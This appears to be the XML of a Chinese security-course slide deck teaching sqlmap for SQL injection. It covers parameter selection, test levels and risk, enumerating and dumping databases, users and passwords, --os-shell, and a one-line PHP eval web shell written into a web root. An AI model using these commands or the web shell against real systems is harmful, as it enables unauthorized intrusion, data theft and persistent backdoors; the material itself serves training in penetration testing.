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41" r:id="rId4"/>
    <p:sldId id="342" r:id="rId5"/>
    <p:sldId id="343" r:id="rId6"/>
    <p:sldId id="344" r:id="rId7"/>
    <p:sldId id="345" r:id="rId8"/>
    <p:sldId id="349" r:id="rId9"/>
    <p:sldId id="350" r:id="rId10"/>
    <p:sldId id="351" r:id="rId11"/>
    <p:sldId id="352" r:id="rId12"/>
    <p:sldId id="354" r:id="rId13"/>
    <p:sldId id="360" r:id="rId14"/>
    <p:sldId id="356" r:id="rId15"/>
    <p:sldId id="357" r:id="rId16"/>
    <p:sldId id="361" r:id="rId17"/>
    <p:sldId id="358" r:id="rId18"/>
    <p:sldId id="366" r:id="rId19"/>
    <p:sldId id="285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848">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="144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2" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="37" d="100"/>
          <a:sy n="37" d="100"/>
        </p:scale>
        <p:origin x="1013" y="19"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1584"/>
        <p:guide pos="848"/>
        <p:guide pos="14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ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当给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sqlmap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的时候，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sqlmap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会做什么：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、判断可注入的参数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、判断可以用那种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注入技术来注入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、识别出那种数据库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、根据用户选择，读取哪些数据。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--dbs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>所有数据库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>--current-db </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>当前网站连接数据库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ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>如果你想看到sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>注入的过程中使用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>最好的等级就是3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通常我们要想检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>型的注入我们可以直接 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>执行一个请求数据包 然后在用  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-p  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>指定出检测参数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>例子：  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sqlmap  -r “/tmp/request.txt”-p “id”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>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>--level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>参数设定为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或者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以上的时候，会尝试对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>User-Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>进行注入。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918450" y="10134600"/>
            <a:ext cx="9683750" cy="1473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409545" y="7954645"/>
            <a:ext cx="2376805" cy="8343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500" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr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</a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0" fontAlgn="auto"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" strike="noStrike" noProof="1"/>
              <a:t>www.bihuo.cn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958638" y="13081000"/>
            <a:ext cx="454025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大纲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23"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-36512" y="1139825"/>
            <a:ext cx="7969250" cy="125412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3984135" y="627434"/>
              </a:cxn>
              <a:cxn ang="5400000">
                <a:pos x="3984135" y="627434"/>
              </a:cxn>
              <a:cxn ang="10800000">
                <a:pos x="3984135" y="627434"/>
              </a:cxn>
              <a:cxn ang="16200000">
                <a:pos x="3984135" y="627434"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="txL" t="txT" r="txR" b="txB"/>
            <a:pathLst>
              <a:path w="21600" h="21600">
                <a:moveTo>
                  <a:pt x="51" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20318" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="1D7EBB"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="228600" tIns="228600" rIns="228600" bIns="228600" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" latinLnBrk="0"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="6000" b="0" i="0" u="none" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="冬青黑体简体中文 W3"/>
                <a:ea typeface="冬青黑体简体中文 W3"/>
                <a:sym typeface="冬青黑体简体中文 W3"/>
              </a:rPr>
              <a:t>本节内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="6000" b="0" i="0" u="none" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="冬青黑体简体中文 W3"/>
              <a:ea typeface="冬青黑体简体中文 W3"/>
              <a:sym typeface="冬青黑体简体中文 W3"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3075" name="Shape 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11958638" y="13081000"/>
            <a:ext cx="454025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>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" latinLnBrk="0"/>
            <a:fld id="{9A0DB2DC-4C9A-4742-B13C-FB6460FD3503}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" u="none" baseline="0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altLang="zh-CN" sz="24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3076" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23602950" y="12155488"/>
            <a:ext cx="781050" cy="779462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3077" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22823488" y="12925425"/>
            <a:ext cx="779462" cy="781050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3078" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22823488" y="0"/>
            <a:ext cx="779462" cy="781050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3079" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23602950" y="776288"/>
            <a:ext cx="781050" cy="779462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body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631113" y="4955531"/>
            <a:ext cx="11124902" cy="1142722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DCDEE0"/>
          </a:soli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4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fontAlgn="auto"/>
            <a:r>
              <a:t>点击此处添加内容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5" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631113" y="7046443"/>
            <a:ext cx="11124902" cy="1142722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DCDEE0"/>
          </a:soli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4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fontAlgn="auto"/>
            <a:r>
              <a:t>点击此处添加内容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7" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631113" y="9137215"/>
            <a:ext cx="11124902" cy="1142722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DCDEE0"/>
          </a:soli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4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fontAlgn="auto"/>
            <a:r>
              <a:t>点击此处添加内容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958638" y="13081000"/>
            <a:ext cx="454025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" name="Shape 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/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" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23603371" y="1215474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6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22822742" y="1292563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5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22822742" y="0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6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23603371" y="775759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 txBox="1"/>
          <p:nvPr userDrawn="1"/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7" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23603371" y="1215474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6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22822742" y="1292563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5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22822742" y="0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Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23603371" y="775759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103" name="图片 2" descr="biankeji.fw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88" y="11730038"/>
            <a:ext cx="1658937" cy="165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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="1196975"/>
            <a:ext cx="561975" cy="2336800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4099" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23602950" y="12155488"/>
            <a:ext cx="781050" cy="779462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4100" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22823488" y="12925425"/>
            <a:ext cx="779462" cy="781050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4101" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22823488" y="0"/>
            <a:ext cx="779462" cy="781050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4102" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23602950" y="776288"/>
            <a:ext cx="781050" cy="779462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algn="ctr" defTabSz="584200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pic>
        <p:nvPicPr>
          <p:cNvPr id="4103" name="图片 2" descr="biankeji.fw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11730038"/>
            <a:ext cx="1658937" cy="165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11958638" y="13081000"/>
            <a:ext cx="454025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8"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12701" y="1196419"/>
            <a:ext cx="561341" cy="2337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5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23603371" y="1215474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6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22822742" y="12925636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5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22822742" y="0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6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23603371" y="775759"/>
            <a:ext cx="780629" cy="7806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4.jpeg" descr="F:\必安科技\总司令\开公司规划\图片\图片1.fw.png图片1.f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" y="19050"/>
            <a:ext cx="24433212" cy="137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385685" y="9470072"/>
            <a:ext cx="9614535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0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0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必火</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="8000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof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b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0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www.bihuo.cn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5124" name="图片 2" descr="qr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5" y="3165475"/>
            <a:ext cx="5543550" cy="554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11958638" y="13081000"/>
            <a:ext cx="454025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958638" y="13081000"/>
            <a:ext cx="454025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27" name="Shape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="9783763"/>
            <a:ext cx="24384000" cy="2211387"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="16093"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="3175">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="35718" tIns="35718" rIns="35718" bIns="35718" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr" defTabSz="409575" latinLnBrk="0"/>
            <a:endParaRPr lang="zh-CN" sz="5000" b="0" i="0" u="none" baseline="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Light"/>
              <a:ea typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8616950" y="10345738"/>
            <a:ext cx="7150100" cy="108743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5718" tIns="35718" rIns="35718" bIns="35718" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="410210">
              <a:defRPr sz="42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pPr fontAlgn="auto"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="66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9" name="图片 9" descr="图925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363" y="3063875"/>
            <a:ext cx="7648575" cy="768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10" descr="6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720000">
            <a:off x="14812963" y="6750050"/>
            <a:ext cx="3236912" cy="325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1" descr="biankeji.f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350" y="3063875"/>
            <a:ext cx="2767013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hape 41"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="9784080"/>
            <a:ext cx="24384000" cy="2210435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="16094"/>
            </a:srgbClr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210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40"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8617267" y="10345399"/>
            <a:ext cx="7149465" cy="108779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5718" tIns="35718" rIns="35718" bIns="35718" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="410210">
              <a:defRPr sz="42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endParaRPr lang="zh-CN" altLang="en-US" sz="6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图925片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361871" y="3063243"/>
            <a:ext cx="7647558" cy="7684155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10" descr="612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20880000">
            <a:off x="14812971" y="6750441"/>
            <a:ext cx="3237405" cy="32546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99512" y="10322580"/>
            <a:ext cx="9407511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Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="6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969" y="1772700"/>
            <a:ext cx="7817485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四、设置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HTTP</a:t>
            </a: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数据包相关参数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9510" y="4099878"/>
            <a:ext cx="20344765" cy="551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--delay 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可以设定两个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请求间的延迟，设定为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的时候是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秒，默认是没有延迟的。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1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--timeout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可以设定一个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请求超过多少秒判定为超时，默认是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30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秒。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5512" y="1696500"/>
            <a:ext cx="467360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五、指定测试参数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0470" y="2542541"/>
            <a:ext cx="20344765" cy="11129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800" b="1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-p ,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sqlmap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 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默认会测试所有的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GET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和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POST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参数，当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--level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的值大于等于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2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的时候也会测试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HTTP Cookie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头的值，当大于等于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3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的时候也会测试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User- Agent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和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HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4400" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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Referer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头的值。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lt"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t> 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例如：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-p “</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4400" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" err="1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id,user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-agent”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4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>--skip</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4400" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:ea typeface="+mn-lt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在使用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--level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时，级别很大的时候，但是有些参数不能去测试，那么可以使用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--skip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参数跳过。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例如：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--skip=”user-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4400" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" err="1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agent,referer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4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>”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altLang="zh-CN" sz="4400" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uFillTx/>
              <a:ea typeface="+mn-lt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5512" y="1696500"/>
            <a:ext cx="467360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六、设定探测等级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512" y="3405189"/>
            <a:ext cx="20344765" cy="7879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--level  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48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-r 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情况下）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4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共有五个等级，默认为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  <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4400" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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使用的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payload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可以在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	xml/payloads.xml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中看到，自己也可以根据相应的格式添加自己的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payload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level&gt;=2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的时候就会测试</a:t>
            </a:r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Helvetica Light"/>
              </a:rPr>
              <a:t>HTTP Cookie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level&gt;=3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的时候就会测试</a:t>
            </a:r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Helvetica Light"/>
              </a:rPr>
              <a:t>HTTP User-Agent/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4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Helvetica Light"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r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Helvetica Light"/>
              </a:rPr>
              <a:t>头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level=5 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN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的时候会测试</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN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HTTP Host</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="440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zh-CN" altLang="en-US" sz="4400" b="1" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0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087" y="1654590"/>
            <a:ext cx="579628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七、设定探测风险等级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0470" y="3625534"/>
            <a:ext cx="20344765" cy="8963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--risk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共有</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" 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三</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0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个风险等级，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" 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1-3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默认是1会测试大部分的测试语句，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2会增加基于</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" 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时间</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0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的测试语句</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0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3会增加OR语句的SQL注入测试。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i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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在有些时候，例如在UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" sz="4400" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4400" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" sz="4400" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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的语句中，注入一个OR的测试语句，可能导致更新的整个表，可能造成很大的风险</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" sz="4400" i="0" u="none" strike="noStrike" cap="none" spc="0" normalizeH="0" baseline="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altLang="zh-CN" sz="4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422" y="1772700"/>
            <a:ext cx="298958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八、列数据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3770" y="2558138"/>
            <a:ext cx="20344765" cy="108782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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN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dbs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--users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--passwords,--is-dba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可以判断当前权限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--technique :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指定使用哪种注入类型 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速度排序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联合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(U)&gt;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报错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(E)&gt;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布尔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(Bool)&gt;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延迟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(Time)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--current-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN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db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 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当前数据库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--privileges </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US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权限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-D </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN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database_name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--tables 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-D </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN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database_name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 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-T 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table_name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 --columns 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-D </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="44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database_name</a:t>
            </a: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-T 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table_name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 -C column_1,column_2  --dump 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--dump-all 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将整个数据库的所有数据进行打包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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN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altLang="zh-CN" sz="4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742" y="1620300"/>
            <a:ext cx="523494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九、一些常用的参数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6500" y="3150236"/>
            <a:ext cx="20344765" cy="9018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--users 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列数据库管理用户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当前用户有权限读取包含所有用户的表的权限时，就可以列出所有管理用户。</a:t>
            </a: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current-user 在大多数据库中可以获取到管理数据的用户。</a:t>
            </a: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--is-dba   判断当前的用户是否为管理，是的话会返回True。</a:t>
            </a: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--privileges 当前用户有权限读取包含所有用户的表的权限时，很可能列举出每个用户的权限，sqlmap将会告诉你哪个是数据库的超级管理员。也可以用-U参数指定你想看那个用户的权限。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2915" y="2644458"/>
            <a:ext cx="20344765" cy="7818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--proxy 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指定一个代理服务器  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eg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: –proxy http://local:8080</a:t>
            </a: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select * from users where id=((((‘???????')))) </a:t>
            </a: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--prefix=PREFIX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="44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注入payload字符串前缀</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4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–suffix=SUFFIX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="44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注入payload字符串后缀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685800" marR="0" lvl="2" indent="-6858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eg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sqlmap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 -u “www.target.com/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index.php?id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=1” -p id --prefix “'))))” </a:t>
            </a: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--suffix “AND ('1'='1”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8512" y="1544100"/>
            <a:ext cx="538480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altLang="en-US" sz="4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charset="0"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>八、使用</a:t>
            </a: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charset="0"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4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charset="0"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>命令：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04325" y="2093320"/>
            <a:ext cx="20344765" cy="12521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参数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--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os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-shell</a:t>
            </a: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前提：需要网站的物理路径，其次是需要有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FILE</a:t>
            </a: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权限。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Root</a:t>
            </a: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权限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+secure-file-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priv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 -r “C:\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\request.txt” -p id  --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dms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mysql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 --</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="480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os</a:t>
            </a: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-shell </a:t>
            </a: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接下来指定网站可写目录：</a:t>
            </a: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“C:\www”</a:t>
            </a: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d:\phpstudy\www   (</a:t>
            </a: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成功）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algn="l">
              <a:lnSpc>
                <a:spcPct val="190000"/>
              </a:lnSpc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echo ^&lt;?php @eval($_GET['x']); ?^&gt; &gt;shell1.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="48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indent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7365" y="2556907"/>
            <a:ext cx="21342350" cy="779700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sqlmap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-u “www.a.com/1.php?id=1” --file-write=”d:/2.txt”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--file-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dest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=”E:/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wwwroot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bihuoedu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one.php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--batch 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全自动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--start=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开始条数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--stop=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结束条数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purge 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清空缓存目录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--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-shell  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反弹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sqlshell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类似于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查询分析器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默认路径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sqlmap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（点</a:t>
            </a:r>
            <a:r>
